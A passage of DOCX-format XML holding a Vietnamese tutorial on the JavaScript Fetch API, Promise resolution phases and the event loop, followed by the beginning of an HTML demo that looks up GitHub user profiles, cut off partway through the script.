        <w:t xml:space="preserve"> Khi gọi fetch(url), JavaScript đẩy tác vụ gửi request xuống Web APIs nền tảng của trình duyệt (chạy trên luồng C++ ngầm của hệ thống), đồng thời trả về ngay lập tức cho Call Stack một Promise ở trạng thái pending. Mã JavaScript tiếp tục chạy các dòng lệnh tiếp theo mà không bị chặn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34942305" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 1 Resolution — HTTP Headers Received:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Ngay khi máy chủ phản hồi các tiêu đề HTTP (Headers), Promise đầu tiên lập tức chuyển sang fulfilled, trả về đối tượng Response. </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LƯU Ý CỐT TỬ:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Lúc này toàn bộ phần thân (body) của dữ liệu vẫn chưa tải xong!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321040FF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 2 Resolution — Body Stream Parsing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Lập trình viên gọi response.json(). Phương thức này kích hoạt việc đọc luồng nhị phân (ReadableStream) của body và phân tích cú pháp sang Object JavaScript, đồng thời trả về một Promise thứ hai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349A49BC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microtask Queue Execution:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Khi việc parse JSON hoàn tất, hàm callback trong .then(data =&gt; ...) được đưa vào </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Microtask Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t>. Sau khi Call Stack trống, Event Loop nhấc callback này ra để JavaScript cập nhật giao diện người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0B75A2" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cơ chế Bắt lỗi Mạng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> Hàm fetch() </w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CHỈ reject khi xảy ra lỗi mạng thực sự</w:t>
      </w:r>
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve"> (như rớt mạng internet, DNS failure, hoặc bị chặn CORS). Nếu server phản hồi mã lỗi 404 Not Found hay 500 Internal Server Error, Promise vẫn được coi là fulfilled! Do đó, lập trình viên bắt buộc phải tự kiểm tra thuộc tính boolean response.ok (mang giá trị true khi HTTP status nằm trong khoảng 200–299).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AC9481" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>Plaintext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9EBBC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ JavaScript Call Stack ] ── fetch(url) ──► [ Browser Web APIs Thread ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10656118" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">           │                                            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4A885F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">           ▼ (Trả về Promise: pending)                  ▼ (Gửi HTTP Request qua Internet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725E7641" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Code chạy tiếp không bị chặn... ]             [ Nhận HTTP Response Headers ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEBA256" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">                                                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BF877E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Microtask Queue ] ◄── .then(res =&gt; res.json()) ───────┘ (Promise 1 fulfilled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDED33" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D41A41A" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼ (Event Loop đưa vào Stack khi rảnh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A416CD5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Parse Body Stream thành JSON Object ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF91D18" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DDE2E8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1856B92C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Microtask Queue ] ◄── .then(data =&gt; renderUI(data)) ── (Promise 2 fulfilled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520A8D1F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D4CAAE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        ▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73706F0B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>[ Cập nhật Giao diện DOM ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B60E053" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Ví dụ code / demo thực tế</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A9637" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B16916" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3219582B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;html lang="vi"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1158481C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D30F86" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760747BE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;title&gt;Fetch API và Promise Hoàn Chỉnh&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058297B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213C1BFE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .user-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A9D9E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border: 1px solid #e2e8f0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D6EAC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-radius: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499B7FC5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8186C0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      max-width: 350px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1B59F4" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      margin-top: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D56B630" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      background: #ffffff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42983364" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      box-shadow: 0 2px 4px rgba(0,0,0,0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F86901" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE137DC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .error-msg {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28CD5D" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      color: #dc2626;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A5B257B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      background: #fef2f2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B9981C" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      padding: 12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0D1508" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      border-radius: 6px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CECA9D9" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      margin-top: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3CD0C8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E227885" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    .spinner {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B768DDD" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2D2163" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      color: #3b82f6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0466C576" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      font-style: italic;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75B1E1F5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="443666A5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760C9E7B" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D28CD04" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t>&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014E07DF" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;h2&gt;Tra Cứu Hồ Sơ Người Dùng GitHub&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29909B54" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA3AA87" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;input type="text" id="username-input" placeholder="Nhập GitHub username (vd: torvalds)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D1C72F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    &lt;button type="button" id="btn-fetch"&gt;Tìm kiếm&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD338DE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24397644" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="4B7ACB78" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;div id="status-container"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DCA059" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;div id="result-container"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B00436E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="0427CFA5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">  &lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0655AA03" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const input = document.querySelector('#username-input');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F67E9FE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const btn = document.querySelector('#btn-fetch');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708871E3" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const statusContainer = document.querySelector('#status-container');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D860FA5" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    const resultContainer = document.querySelector('#result-container');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B130249" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="034B8017" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    // Hàm gọi mạng sử dụng chuẩn Promise Chaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027DB678" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">    function fetchGitHubUser(username) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCDD158" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // 1. Hiển thị trạng thái Loading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E4ECD7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      statusContainer.innerHTML = '&lt;span class="spinner"&gt;Đang tải dữ liệu từ máy chủ GitHub...&lt;/span&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165EB811" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      resultContainer.innerHTML = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC83459" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7"/>
    <w:p w14:paraId="7D8D21CE" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      // 2. Khởi động Fetch request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A56D61F" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">      fetch(`https://api.github.com/users/${username}`)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60612785" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        .then((response) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36055E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // BƯỚC SỐNG CÒN: Kiểm tra response.ok để tự bắt lỗi 404, 500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557897C7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          if (!response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6382B7" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            if (response.status === 404) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9A5CA8" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">              throw new Error(`Không tìm thấy người dùng có tên "${username}" (Lỗi 404)`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE15905" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1620F34E" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">            throw new Error(`Máy chủ phản hồi mã lỗi HTTP: ${response.status}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922ACB0" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12479C01" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          // Chuyển đổi dữ liệu nhị phân sang JavaScript Object (trả về Promise thứ 2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60389174" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">          return response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7530E6BB" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
      <w:r w:rsidRPr="00D366A7">
        <w:t xml:space="preserve">        })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70107ABC" w14:textId="77777777" w:rsidR="00D366A7" w:rsidRPr="00D366A7" w:rsidRDefault="00D366A7" w:rsidP="00D366A7">
